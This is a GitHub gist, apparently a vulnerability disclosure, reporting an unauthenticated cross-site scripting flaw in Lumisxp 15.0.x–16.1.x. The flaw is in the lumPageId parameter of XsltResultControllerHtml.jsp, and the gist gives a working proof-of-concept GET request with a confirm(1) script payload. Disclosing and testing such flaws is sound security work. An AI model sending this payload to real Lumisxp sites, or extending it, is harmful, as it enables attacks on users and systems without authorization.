rodnt/xss-lumisxp.md

Last active June 12, 2024 15:09

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/rodnt/51ae2897abfff1bdcedccf72edbf3d24.js"></script>
Save rodnt/51ae2897abfff1bdcedccf72edbf3d24 to your computer and use it in GitHub Desktop.

Download ZIP

Unauthenticated XSS Lumisxp 15.0.x <= 16.1.x XsltResultControllerHtml.jsp

Raw

xss-lumisxp.md

Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the XsltResultControllerHtml.jsp page, specifically in the lumPageId parameter.

Request

Payload:

GET request:

GET /portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=

Request Proof:
Execute Payload:

Author: Rodolfo Tavares